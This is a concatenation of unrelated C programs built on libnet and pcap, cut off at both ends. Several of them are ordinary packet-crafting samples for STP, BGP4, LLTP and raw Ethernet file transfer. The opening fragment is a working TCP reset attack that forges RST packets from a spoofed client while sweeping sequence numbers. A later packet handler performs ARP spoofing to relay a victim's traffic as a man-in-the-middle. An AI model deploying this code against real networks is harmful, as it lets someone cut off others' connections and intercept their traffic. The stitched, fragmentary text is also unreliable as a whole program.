} else {
cli_port = "10001";
}
if (argc >= 4) {
srv_addr = argv[3];
} else {
srv_addr = "127.0.0.1";
}
if (argc >= 5) {
srv_port = argv[4];
}
else {
srv_port = "9999";
}
seq_num = 1200000000;
ip_tag=0;
tcp_tag=0;
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
srv_ip_addr = libnet_name2addr4(attack, srv_addr, LIBNET_DONT_RESOLVE);
cli_ip_addr = libnet_name2addr4(attack, cli_addr, LIBNET_DONT_RESOLVE);
//atoi(cli_port);
//atoi(srv_port);
libnet_build_tcp( atoi(cli_port), /* src port */ //problem
atoi(srv_port), /* destination port */ //problem
seq_num, /* sequence number */
0, /* acknowledgement */
TH_RST, /* control flags */
7, /* window */
0, /* checksum - 0 = autofill */
0, /* urgent */
LIBNET_TCP_H, /* header length */
NULL, /* payload */
0, /* payload length */
attack, /* libnet context */
tcp_tag); /* protocol tag */
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, /* length */
0, /* TOS */
libnet_get_prand (LIBNET_PRu16), /* IP ID */
0, /* frag offset */
127, /* TTL */
IPPROTO_TCP, /* upper layer protocol */
0, /* checksum, 0=autofill */
cli_ip_addr, /* src IP */
srv_ip_addr, /* dest IP */
NULL, /* payload */
0, /* payload len */
attack, /* libnet context */
ip_tag); /* protocol tag */
printf("starting reset attack on TCP connection: client %s:%s, server %s:%s\n",
cli_addr, cli_port, srv_addr, srv_port);
printf("Libnet value: %d: %u\nServer Port: %s\nClient Port: %s", libnet_write(attack), seq_num, srv_port, cli_port);
//libnet_write(attack)
libnet_destroy(attack);
for(seq_num = (1200000000-16384); seq_num>0; seq_num=(seq_num-16384))
{
attack = libnet_init(LIBNET_RAW4, srv_addr, error_msg); // 2nd parameter device may have to be changed
libnet_build_tcp(atoi(cli_port), atoi(srv_port), seq_num,
0, TH_RST, 7,0, 0, LIBNET_TCP_H, NULL, 0, attack, tcp_tag);
libnet_build_ipv4(LIBNET_TCP_H + LIBNET_IPV4_H, 0, libnet_get_prand (LIBNET_PRu16), 0, 127, IPPROTO_TCP,
0, cli_ip_addr, srv_ip_addr, NULL, 0, attack, ip_tag);
//libnet_write(attack);
//printf("Libnet value: %d: %d\n", libnet_write(attack), seq_num);
libnet_write(attack);
libnet_destroy(attack);
}
printf("Test3"); //attack successful
//libnet_destroy(attack);
return 0;
}
int main (int argc, char *argv[]) {
char *dev = NULL;
char errbuf [ERRBUF_SIZE]; /* Error string */
struct bpf_program fp; /* The compiled filter */
char filter_exp[] = "ether proto 0x88d9"; //"port 80"; /* The filter expression */
bpf_u_int32 mask; /* Our netmask */
bpf_u_int32 net; /* Our IP */
struct pcap_pkthdr header;
const u_char *packet;
int c,i;
libnet_t *l;
libnet_ptag_t eth_ptag = 0;
u_char buf[0x100];
struct itimerspec tspec;
memset(&tspec, 0, sizeof(tspec));
tspec.it_value.tv_sec = 3;
while ((c = getopt(argc, argv, "t:i:hvu")) != EOF) {
switch (c) {
case 'i': // interface
dev = optarg;
break;
case 't': // timeout
i = atoi(optarg);
if( i>0 ) {
#ifndef __linux__
if( i > PCAP_PERIOD ) i-=PCAP_PERIOD-10; // try to be more precise
#endif
tspec.it_value.tv_sec = i/1000;
tspec.it_value.tv_nsec = (i%1000)*1000000;
}
break;
case 'v': // verbosity
verbose++;
break;
case 'u': // unicode support
unicode = 1;
break;
case 'h': // show usage
usage(argv[0]);
exit(EXIT_SUCCESS);
default:
exit(EXIT_FAILURE);
}
}
argc -= optind;
argv += optind;
if( argc > 1 ) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
if( argc == 1 ) {
if( strlen(argv[0]) != 17 ) {
fprintf(stderr, "Invalid MAC-address: '%s'\n", argv[0]);
exit(EXIT_FAILURE);
}
mac_to_find = argv[0];
}
setlinebuf(stdout);
if(!dev) dev = pcap_lookupdev(errbuf);
if (dev == NULL) {
fprintf(stderr, "Couldn't find default device: %s\n", errbuf);
return (2);
}
printf("interface %s\n",dev);
l = libnet_init(LIBNET_LINK, dev, errbuf);
if (l == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
/* Find the properties for the device */
if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
fprintf(stderr, "Couldn't get netmask for device %s: %s\n", dev, errbuf);
net = 0;
mask = 0;
}
struct ether_addr *ha = NULL;
if ((ha = (struct ether_addr *) libnet_get_hwaddr(l)) == NULL) {
fprintf(stderr, "%s", libnet_geterror(l));
exit(EXIT_FAILURE);
}
// LLTP magic packet
char* payload = "\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00";
char* hwdst = "\xff\xff\xff\xff\xff\xff";
memcpy(buf,payload,18);
memcpy(buf+10, ha, 6);
gettimeofday(&start_time, NULL);
memcpy(buf+16, &start_time.tv_sec, 2); // emulate sequence number
eth_ptag = libnet_build_ethernet(
hwdst, /* ethernet destination */
ha->ether_addr_octet,
/* ethernet source */
0x88d9, /* protocol type */
buf, /* payload */
18, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (eth_ptag == -1) {
fprintf(stderr, "Can't build ethernet header: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Open the session in promiscuous mode */
pcap_handle = pcap_open_live(dev, BUFSIZ, 1, PCAP_PERIOD, errbuf);
if (pcap_handle == NULL) {
fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
libnet_destroy(l);
return (2);
}
/* Compile and apply the filter */
if (pcap_compile(pcap_handle, &fp, filter_exp, 0, net) == -1) {
fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(pcap_handle));
libnet_destroy(l);
return (2);
}
if (pcap_setfilter(pcap_handle, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(pcap_handle));
libnet_destroy(l);
return (2);
}
signal(SIGALRM, on_alarm);
gettimeofday(&start_time, NULL);
timer_create(CLOCK_MONOTONIC, NULL, &timer_id);
timer_settime(timer_id, 0, &tspec, NULL);
// don't know why, but pcap_dispatch does not return control to main after
// timeout expires. so, we use nonblocking pcap on linux.
#ifdef __linux__
pcap_setnonblock(pcap_handle, 1, errbuf);
#endif
while( !do_stop ) {
pcap_dispatch(pcap_handle, -1, got_packet, NULL);
#ifdef __linux__
usleep(1000);
#endif
}
pcap_close(pcap_handle);
i = tv_diff2msec(NULL);
printf("found %d hosts in %d.%d seconds", nhosts, i/1000, i%1000);
if( mac_to_find && !mac_found ) {
printf(", but '%s' is not found.\n", mac_to_find);
} else {
puts("");
}
return (0);
}
/****************************
* CREATION OF PACKET STATE *
****************************/
void got_packet(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
const struct sniff_ethernet *ethernet; /* The ethernet header */
const struct sniff_ip *ip; /* The IP header */
const struct sniff_tcp *tcp; /* The TCP header */
const struct sniff_udp *udp;
u_int8_t *payload; /* Packet payload */
u_int size_ip;
u_int size_protocol;
u_int16_t length_protocol;
/* Spoofed src and the real dst of the packets */
u_int32_t dip;
u_int32_t sip;
u_int8_t *daddr;
u_int8_t *saddr;
/* GET PACKET INFORMATION SUB-STATE */
if (packet == NULL)
{
printf(" * No packet received\n");
return;
}
if (DEBUG == 1)
{
printf(" DEBUG: Packet is not null\n Packet Type:\n");
}
ethernet = (struct sniff_ethernet*)(packet);
if (ethernet->ether_type == ETHER_IP)
{
ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
size_ip = IP_HL(ip)*4;
if (size_ip < 20) {
printf(" * Invalid IP header length: %i bytes\n", size_ip);
return;
}
if (DEBUG == 1)
{
printf(" * It's a valid IP packet\n");
}
/* Distinguish between TCP and UDP packets */
if (ip->ip_p == TCP_PROTOCOL)
{
tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
size_protocol = TH_OFF(tcp)*4;
if (size_protocol < 20) {
printf(" * Invalid TCP header length: %u bytes\n", size_protocol);
return;
}
}
else if (ip->ip_p == UDP_PROTOCOL)
{
udp = (struct sniff_udp*)(packet + SIZE_ETHERNET + size_ip);
size_protocol = SIZE_UDP;
}
}
else if (ethernet->ether_type == ETHER_ARP)
{
struct sniff_arp * arp;
arp = (struct sniff_arp*)(packet + SIZE_ETHERNET);
if (DEBUG)
{
printf(" * It's a ARP Packet\n");
}
int length;
spoof_arp(inet_addr(victim_ip), /* target (me) protocol address */
inet_addr((char*)arp->arp_spa), /* destination (hacker) protocol address */
(u_int8_t*) libnet_hex_aton(victim_ethernet, &length), /* target (me) hw address */
(u_int8_t*) &arp->arp_sha); /* destination protocol address */
spoof_arp(inet_addr(relayer_ip),
inet_addr((char*)arp->arp_spa),
(u_int8_t*) libnet_hex_aton(relayer_ethernet, &length),
(u_int8_t*) &arp->arp_sha);
return;
}
else
{
fprintf(stderr, "Don't know this protocol. Shutting down\n");
exit(1);
}
/* FIGURE OUT WHOM TO SEND THE PACKET AND SPOOF WHOM
ITS FROM SUB-STATE (puh! long name) */
/* Ignoring the PORT because they doesn't matter in
deciding where to send the packet. The ports will
be the same if it's the relayere, victim or the hacker
which receives the packet */
if (DEBUG == 1)
{
printf(" DEBUG: Deciding source and destionation addresses:\n");
}
int length; /* don't know why I need this ... But just to be safe.. */
if(ip->ip_dst.s_addr == inet_addr(victim_ip)) /* Not sure if this comparison works... */
{
sip = inet_addr(relayer_ip);
saddr = (u_int8_t*)libnet_hex_aton(relayer_ethernet, &length);
if (saddr == NULL)
{
fprintf(stderr, "Couldn't Convert MAC address: %s\n", relayer_ethernet);
exit(1);
}
if (DEBUG == 1)
{
printf(" * Src IP: %s\n", relayer_ip);
printf(" * Dst Ether: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
saddr[0],saddr[1],saddr[2],saddr[3],saddr[4],saddr[5]);
}
}
else if (ip->ip_dst.s_addr == inet_addr(relayer_ip))
{
sip = inet_addr(victim_ip);
saddr = (u_int8_t*)libnet_hex_aton(victim_ethernet, &length);
if (saddr == NULL)
{
fprintf(stderr, "Couldn't Convert MAC address: %s\n", victim_ethernet);
exit(1);
}
if (DEBUG == 1)
{
printf(" * Src IP: %s\n", victim_ip);
printf(" * Dst Ether: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
saddr[0],saddr[1],saddr[2],saddr[3],saddr[4],saddr[5]);
}
}
/* destination is always the same */
dip = ip->ip_src.s_addr;
daddr = (u_int8_t*)ethernet->ether_shost;
if (daddr == NULL)
{
fprintf(stderr, "Couldn't fetch the dst MAC addr from ethernet header\n");
exit(1);
}
if (DEBUG == 1)
{
printf(" * Dst IP: %s\n", inet_ntoa(ip->ip_src));
printf(" * Dst Ether: %.2x:%.2x:%.2x:%.2x:%.2x:%.2x\n",
daddr[0],daddr[1],daddr[2],daddr[3],daddr[4],daddr[5]);
}
/* GENERATE PACKET SUB-STATE */
if (DEBUG == 1)
{
printf(" DEBUG: Trying to generate packet\n");
}
/* Initialize libnet */
libnet_t *l;
char errbuf_net[LIBNET_ERRBUF_SIZE];
l = libnet_init(LIBNET_LINK, dev, errbuf_net);
if(l == NULL)
{
fprintf(stderr, "Error Opening Context: %s\n", errbuf_net);
return;
}
if(ethernet->ether_type == ETHER_IP)
{
if (ip->ip_p == TCP_PROTOCOL)
{
/* Create TCP packet with switched src and dst ports */
libnet_ptag_t libnet_tcp = 0;
int size_payload;
size_payload = ntohs(ip->ip_len) - (size_ip + size_protocol);
u_int8_t *tcp_options = (u_int8_t* )(packet + SIZE_ETHERNET + size_ip + 20);
u_int32_t size_tcp_options = (u_int32_t)(size_protocol - 20);
libnet_build_tcp_options(tcp_options, size_tcp_options, l, 0);
if (size_payload == 0)
{
payload = NULL;
}
else
{
payload = (u_int8_t *)(packet + SIZE_ETHERNET + size_ip + size_protocol);
}
if (DEBUG == 1)
{
printf(" * Size of payload %i\n", size_payload);
printf(" * Size of IP header %i\n", size_ip);
printf(" * Size of IP length %i\n", ip->ip_len);
}
length_protocol = size_protocol + size_payload;
libnet_tcp = libnet_build_tcp(htons(tcp->th_sport),
htons(tcp->th_dport),
ntohl(tcp->th_seq),
ntohl(tcp->th_ack),
tcp->th_flags,
ntohs(tcp->th_win),
0,
ntohs(tcp->th_urp),
length_protocol,
payload,
size_payload,
l,
libnet_tcp);
if (libnet_tcp == -1)
{
fprintf(stderr, "Unable to build TCP header: %s\n", libnet_geterror(l));
exit(1);
}
if (DEBUG == 1)
{
printf(" * IP packet successfully generated\n");
}
}
else if (ip->ip_p == UDP_PROTOCOL)
{
/* Create a new UDP packet but with switched ports */
libnet_ptag_t libnet_udp = 0;
int size_payload;
size_payload = ntohs(ip->ip_len) - size_ip;
payload = (u_int8_t *)(packet + SIZE_ETHERNET + size_ip + size_protocol);
length_protocol = (udp->uh_length) + size_payload;
libnet_udp = libnet_build_udp(htons(udp->uh_dport),
htons(udp->uh_sport),
length_protocol,
0,
payload,
size_payload,
l,
libnet_udp);
if (libnet_udp == -1)
{
fprintf(stderr, "Unable to build UDP header: %s\n", libnet_geterror(l));
exit(1);
}
}
/* Create a new IP packet with the IP for src and dst switched */
u_int8_t* ip_options = (u_int8_t*)(packet + SIZE_ETHERNET + 20);
u_int32_t size_ip_options = (u_int32_t)(size_ip - 20);
libnet_build_ipv4_options(ip_options, size_ip_options, l, 0);
int size_ip_payload;
u_int8_t* ip_payload;
if (ip->ip_p == TCP_PROTOCOL || ip->ip_p == UDP_PROTOCOL)
{
ip_payload = NULL;
size_ip_payload = 0;
}
else
{
ip_payload = (u_int8_t*)(packet + SIZE_ETHERNET + size_ip);
size_ip_payload = ntohs(ip->ip_len) - size_ip;
}
libnet_ptag_t libnet_ipv4 = 0;
libnet_ipv4 = libnet_build_ipv4(ntohs(ip->ip_len),
ip->ip_tos,
ntohs(ip->ip_id),
ntohs(ip->ip_off),
ip->ip_ttl,
ip->ip_p,
0,
sip,
dip,
ip_payload,
size_ip_payload,
l,
libnet_ipv4);
if (libnet_ipv4 == -1)
{
fprintf(stderr, "Unable to build IPv4 header: %s\n", libnet_geterror(l));
exit(1);
}
}
/* Last but not least the Ethernet packet (Not sure if we're gonna need it) */
libnet_ptag_t libnet_eth = 0;
libnet_eth = libnet_build_ethernet(daddr,
saddr,
ETHERTYPE_IP,
NULL,
0,
l,
libnet_eth);
if (libnet_eth == -1)
{
fprintf (stderr, "Unable to build Ethernet header: %s\n", libnet_geterror(l));
exit(1);
}
if (DEBUG == 1)
{
printf(" * Ethernet packet successfully generated\n");
}
/* This probably not a good idea to run for a long time
on my own network */
if ((libnet_write(l)) == -1)
{
fprintf(stderr, "Unable to send packet: %s\\n", libnet_geterror(l));
exit(1);
}
else
{
if (DEBUG == 1)
{
printf(" DEBUG: Packet replicated and sent\n");
}
}
libnet_destroy(l); /* Always need to call this before returning
* It should have been a mechanism that you could
* use for "after return do this"
*/
}
int
main(int argc, char *argv[])
{
int c, len, type;
libnet_t *l;
libnet_ptag_t t;
u_char *dst, *src;
u_char rootid[8], bridgeid[8];
char *device = NULL;
char errbuf[LIBNET_ERRBUF_SIZE];
printf("libnet 1.1 packet shaping: [STP]\n");
device = NULL;
src = dst = NULL;
type = CONF;
while ((c = getopt(argc, argv, "cd:i:s:t")) != EOF)
{
switch (c)
{
case 'c':
type = CONF;
break;
case 'd':
dst = libnet_hex_aton(optarg, &len);
break;
case 'i':
device = optarg;
break;
case 's':
src = libnet_hex_aton(optarg, &len);
break;
case 't':
type = TCN;
break;
default:
usage(argv[0]);
exit(EXIT_FAILURE);
}
}
if (src == NULL || dst == NULL)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_LINK, /* injection type */
device, /* network interface */
errbuf); /* errbuf */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
if (type == CONF)
{
rootid[0] = 0x80;
rootid[1] = 0x00;
rootid[2] = 0x00;
rootid[3] = 0x07;
rootid[4] = 0xec;
rootid[5] = 0xae;
rootid[6] = 0x30;
rootid[7] = 0x41;
bridgeid[0] = 0x80;
bridgeid[1] = 0x00;
bridgeid[2] = 0x00;
bridgeid[3] = 0x07;
bridgeid[4] = 0xec;
bridgeid[5] = 0xae;
bridgeid[6] = 0x30;
bridgeid[7] = 0x41;
t = libnet_build_stp_conf(
0x0000, /* protocol id */
0x00, /* protocol version */
0x00, /* BPDU type */
0x00, /* BPDU flags */
rootid, /* root id */
0x00000001, /* root path cost */
bridgeid, /* bridge id */
0x8002, /* port id */
0x00, /* message age */
0x0014, /* max age */
0x0002, /* hello time */
0x000f, /* forward delay */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build STP conf header: %s\n",
libnet_geterror(l));
goto bad;
}
}
else
{
t = libnet_build_stp_tcn(
0x0000, /* protocol id */
0x00, /* protocol version */
0x80, /* BPDU type */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build STP tcn header: %s\n",
libnet_geterror(l));
goto bad;
}
}
t = libnet_build_802_2(
LIBNET_SAP_STP, /* DSAP */
LIBNET_SAP_STP, /* SSAP */
0x03, /* control */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(l));
goto bad;
}
t = libnet_build_802_3(
dst, /* ethernet destination */
src, /* ethernet source */
LIBNET_802_2_H + ((type == CONF) ? LIBNET_STP_CONF_H :
LIBNET_STP_TCN_H), /* frame size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build ethernet header: %s\n",
libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte STP packet; check the wire.\n", c);
}
free(dst);
free(src);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
free(dst);
free(src);
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main(int argc, char **argv)
{
int c, n, i, proto, packet_size, pause_us, retransmit, file_size, num_packets, npacket;
char *end;
libnet_t *ln_ctx;
char ln_errbuf[LIBNET_ERRBUF_SIZE];
struct libnet_ether_addr *ln_hwaddr;
libnet_ptag_t ln_ptag;
pcap_t *pcap_ctx;
char pcap_errbuf[PCAP_ERRBUF_SIZE], pcap_fp_str[64];
struct bpf_program pcap_fp;
struct pcap_pkthdr pcap_hdr;
FILE *fp;
unsigned char buf[ETH_DATA_LEN], dest_mac_addr[ETH_ALEN];
struct pkt_hdr *pkt_hdr;
struct vlan_eth_hdr *vlan_eth_hdr;
proto = 0xCAFE;
packet_size = ETH_DATA_LEN - PKT_HDR_SIZE;
pause_us = 1000;
retransmit = 3;
while ((c = getopt(argc, argv, "p:s:w:r:")) != -1)
{
switch (c)
{
case 'p':
proto = strtol(optarg, &end, 0);
if ((*end != '\0'))
usage(argv[0]);
break;
case 's':
packet_size = strtol(optarg, &end, 0);
if ((*end != '\0'))
usage(argv[0]);
if ((packet_size <= 0) || (packet_size > (ETH_DATA_LEN - PKT_HDR_SIZE)))
packet_size = ETH_DATA_LEN - PKT_HDR_SIZE;
break;
case 'w':
pause_us = strtol(optarg, &end, 0);
if ((*end != '\0'))
usage(argv[0]);
if (pause_us <= 0)
pause_us = 1;
break;
case 'r':
retransmit = strtol(optarg, &end, 0);
if ((*end != '\0'))
usage(argv[0]);
if (retransmit < 0)
retransmit = 0;
break;
case '?':
default:
fprintf(stderr, "unrecognized option: %c\n", c);
usage(argv[0]);
}
}
if (argc != (optind + 3))
usage(argv[0]);
if (strlen(argv[optind]) <= 0)
usage(argv[0]);
ln_ctx = libnet_init(LIBNET_LINK, argv[optind], ln_errbuf);
if (ln_ctx == NULL)
{
fprintf(stderr, "couldn't initialize libnet context: %s\n", ln_errbuf);
exit(1);
}
if (str2mac(argv[optind + 1], dest_mac_addr) != 0)
usage(argv[0]);
pcap_ctx = pcap_open_live(argv[optind], BUFSIZ, 1, 1000, pcap_errbuf);
if (pcap_ctx == NULL)
{
fprintf(stderr, "couldn't initialize pcap context: %s\n", pcap_errbuf);
exit(1);
}
sprintf(pcap_fp_str, "ether proto 0x%04x and ether src %02x:%02x:%02x:%02x:%02x:%02x",
proto, dest_mac_addr[0], dest_mac_addr[1], dest_mac_addr[2], dest_mac_addr[3],
dest_mac_addr[4], dest_mac_addr[5]);
printf("pcap filter: %s\n", pcap_fp_str);
if (pcap_compile(pcap_ctx, &pcap_fp, pcap_fp_str, 0, PCAP_NETMASK_UNKNOWN) == -1)
{
fprintf(stderr, "couldn't compile pcap filter: %s\n", pcap_geterr(pcap_ctx));
exit(1);
}
if (pcap_setfilter(pcap_ctx, &pcap_fp) == -1)
{
fprintf(stderr, "couldn't set pcap filter: %s\n", pcap_geterr(pcap_ctx));
exit(1);
}
fp = fopen(argv[optind + 2], "r");
if (fp == NULL)
{
fprintf(stderr, "couldn't open file '%s'\n", argv[optind + 2]);
exit(1);
}
fseek(fp, 0, SEEK_END);
file_size = ftell(fp);
fseek(fp, 0, SEEK_SET);
printf("file size #%d\n", file_size);
if (file_size == 0)
{
printf("file is empty, terminating\n");
exit(0);
}
ln_hwaddr = libnet_get_hwaddr(ln_ctx);
ln_ptag = libnet_build_ethernet(dest_mac_addr, (u_int8_t *) ln_hwaddr,
proto, NULL, 0, ln_ctx, 0);
if (ln_ptag == -1)
{
fprintf(stderr, "couldn't create libnet packet: %s\n", libnet_geterror(ln_ctx));
exit(1);
}
num_packets = (file_size + packet_size - 1) / packet_size;
npacket = 0;
while ((n = fread(buf + PKT_HDR_SIZE, 1, packet_size, fp)) > 0)
{
pkt_hdr = (struct pkt_hdr *) buf;
memset(pkt_hdr, 0, PKT_HDR_SIZE);
pkt_hdr->magic = htonl(PKT_MAGIC);
pkt_hdr->offset = htonl(npacket * packet_size);
pkt_hdr->size = htonl(n);
if (n < packet_size)
pkt_hdr->flags |= PKT_FLAG_LAST;
pkt_hdr->flags = htonl(pkt_hdr->flags);
npacket++;
if (libnet_build_ethernet(dest_mac_addr, (u_int8_t *) ln_hwaddr,
proto, buf, n + PKT_HDR_SIZE, ln_ctx, ln_ptag) == -1)
{
fprintf(stderr, "couldn't modify libnet packet #%d: %s\n",
npacket, libnet_geterror(ln_ctx));
exit(1);
}
for (i = 0; i < retransmit + 1; i++)
{
printf("sending packet #%d of #%d\n", npacket, num_packets);
if ((libnet_write(ln_ctx)) == -1)
{
fprintf(stderr, "couldn't send packet #%d: %s\n", npacket, libnet_geterror(ln_ctx));
exit(1);
}
/*vlan_eth_hdr = (struct vlan_eth_hdr *) pcap_next(pcap_ctx, &pcap_hdr);
if (vlan_eth_hdr == NULL)
{
fprintf(stderr, "timeout ack for packet #%d\n", npacket);
goto next;
}*/
/*if (pcap_hdr.len < (VLAN_ETH_HLEN + PKT_HDR_SIZE))
{
fprintf(stderr, "invalid ack for packet #%d\n", npacket);
goto next;
}
pkt_hdr = (struct pkt_hdr *) (vlan_eth_hdr + 1);
pkt_hdr->offset = ntohl(pkt_hdr->offset);
if (pkt_hdr->offset == ((npacket - 1) * packet_size + n))
{
printf("received ack for packet #%d\n", npacket);
break;
}
else
{
fprintf(stderr, "bad ack for packet #%d, offset 0x%x\n",
npacket, pkt_hdr->offset);
goto next;
}*/
next:
usleep(1000);
}
if (i == (retransmit + 1))
{
//fprintf(stderr, "no ack received for packet #%d\n", npacket);
//exit(1);
}
if (pause_us > 0)
usleep(pause_us);
}
fclose(fp);
pcap_close(pcap_ctx);
libnet_destroy(ln_ctx);
exit(0);
}
int main()
{
int c, i, seqn;
libnet_t *l;
libnet_ptag_t tcp, ip, eth;
uint8_t *payload, SA[6], DA[6];
ushort payload_s;
uint32_t src_ip, dst_ip;
uint16_t src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
struct libnet_ether_addr *enet_src;
payload_s = 10;
payload = malloc(payload_s*sizeof(uint8_t));
memset(payload,0,payload_s);
l = libnet_init(LIBNET_LINK, "nf2c0", errbuf);
if(l == NULL){
printf("libnet_init() error\n");
goto bad;
}
enet_src = libnet_get_hwaddr(l);
src_ip = libnet_get_ipaddr4(l);
dst_ip = (192) | (168<<8) | (101<<16) | (20);
//char *srcip;
//srcip = libnet_addr2name4(dst_ip,LIBNET_DONT_RESOLVE);
//printf("conversion: %s %d\n", srcip,LIBNET_IPV4_H+LIBNET_TCP_H+LIBNET_ETH_H+payload_s);
//return 0;
sprintf((char*)SA,"%02x:%02x:%02x:%02x:%02x:%02x",
(uint8_t)enet_src->ether_addr_octet[0],
(uint8_t)enet_src->ether_addr_octet[1],
(uint8_t)enet_src->ether_addr_octet[2],
(uint8_t)enet_src->ether_addr_octet[3],
(uint8_t)enet_src->ether_addr_octet[4],
(uint8_t)enet_src->ether_addr_octet[5]);
sprintf((char*)DA,"%02x:%02x:%02x:%02x:%02x:%02x",
0x0,0x4E,0x46,0x32,0x43,0x0);
src_prt = 80;
dst_prt = 1010;
//src_ip = (192) | (164<<8)| (0<<16) | (55<<24);
tcp = ip = eth = LIBNET_PTAG_INITIALIZER;
//for(i=1;i<11;i++){
for(i=0;i<10;i++){
seqn=i*(LIBNET_TCP_H+payload_s+1);
tcp = libnet_build_tcp(
src_prt,
dst_prt,
seqn,
seqn+LIBNET_TCP_H+payload_s+1,
TH_SYN | TH_ACK,
0,
0,
10,
LIBNET_TCP_H+payload_s,
payload, payload_s, l, tcp);
if(tcp ==-1){
printf("libnet_build_tcp() error\n");
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,
0,
242,
0,
64,
IPPROTO_TCP,
0,
src_ip,
dst_ip,
NULL,
0,
l,
ip);
if(ip==-1){
printf("libnet_build_ipv4() error\n");
goto bad;
}
eth = libnet_build_ethernet(
DA,
SA,
ETHERTYPE_IP,
NULL,
0,
l,
eth);
if(eth==-1){
printf("libnet_build_ethernet() error\n");
goto bad;
}
c = libnet_write(l);
if(c==-1){
printf("libnet_write() error\n");
goto bad;
}
else
printf("Wrote %d byte TCP packet.\nSeqNum: %d, ackNum: %d\n\n",c,seqn,seqn+LIBNET_TCP_H+payload_s+1);
//printf("Wrote %d byte TCP packet.\n",c);
sleep(1);
}
libnet_destroy(l);
return 0;
bad:
libnet_destroy(l);
exit(EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
u_char type;
printf("libnet 1.1 packet shaping: BGP4 hdr + payload[raw]\n");
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
type = 0;
while ((c = getopt(argc, argv, "d:s:t:m:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'm':
memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE);
break;
case 't':
type = atoi(optarg);
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
length = LIBNET_BGP4_HEADER_H + payload_s;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
type, /* message type */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
